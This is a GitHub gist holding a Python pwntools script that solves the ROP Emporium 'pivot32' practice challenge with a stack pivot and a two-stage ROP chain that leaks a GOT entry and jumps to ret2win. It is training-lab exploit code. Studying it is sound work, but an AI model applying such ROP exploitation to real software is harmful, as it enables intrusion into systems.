Skip to content

Instantly share code, notes, and snippets.

@st4rk
Created Sep 8, 2017
Embed
What would you like to do?
#!/usr/bin/env python
"""
Stack Pivot ropemporium
"""
from pwn import *
import struct
import binascii
PIVOT_POP_EAX = 0x080488C0
PIVOT_XCHG_EAX_ESP = 0x080488C2
PIVOT_MOV_EAX_PTR_EAX = 0x080488C4
PIVOT_ADD_EAX_EBX = 0x080488C7
PIVOT_POP_EBX = 0x08048571
PIVOT_JMP_EAX = 0x08048A5F
def build_first_rop(heap_addr):
print('[*] Building first rop-chain...')
rop = struct.pack('B', 0x41) * 0x2C # fill with garbage until overwrite the return address
rop += struct.pack('=I', PIVOT_POP_EAX) # POP EAX
rop += struct.pack('=I', heap_addr) # heap addr
rop += struct.pack('=I', PIVOT_XCHG_EAX_ESP) # XCHG EAX, ESP <--- stack pivot
print("[*] First ROP: %s" % binascii.hexlify(rop))
print('[*] Done')
return rop
def build_secondary_rop():
print('[*] Building secondary rop-chain...')
# 0x0804A024 foothold_function
# plan:
# get the foothold_function address
# + 0x1F7 to ret2win and call it
rop = struct.pack('=I', 0x080485F0)
rop += struct.pack('=I', PIVOT_POP_EAX)
rop += struct.pack('=I', 0x0804A024) # foothold_funciton .got.plt
rop += struct.pack('=I', PIVOT_MOV_EAX_PTR_EAX) # read the dynamic library address
rop += struct.pack('=I', PIVOT_POP_EBX)
rop += struct.pack('=I', 0x1F7)
rop += struct.pack('=I', PIVOT_ADD_EAX_EBX)
rop += struct.pack('=I', PIVOT_JMP_EAX)
print("[*] Secondary ROP: %s" % binascii.hexlify(rop))
print('[*] Done')
return rop
def magic(p):
print('[*] yolo')
p.recvuntil(': ')
heap_addr = int(p.recvline(),16)
print("[*] Heap buffer addr: " + hex(heap_addr))
gdb.attach(p)
p.recvuntil('>')
small_rop = build_first_rop(heap_addr)
secondary_rop = build_secondary_rop()
print('[*] Sending the secondary rop-chain')
p.sendline(secondary_rop)
print('[*] Done')
p.recvuntil('>')
print('[*] Show time')
p.sendline(small_rop)
sleep(2)
dump = p.readline()
print(dump)
def main():
p = process(['./pivot32'])
magic(p)
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment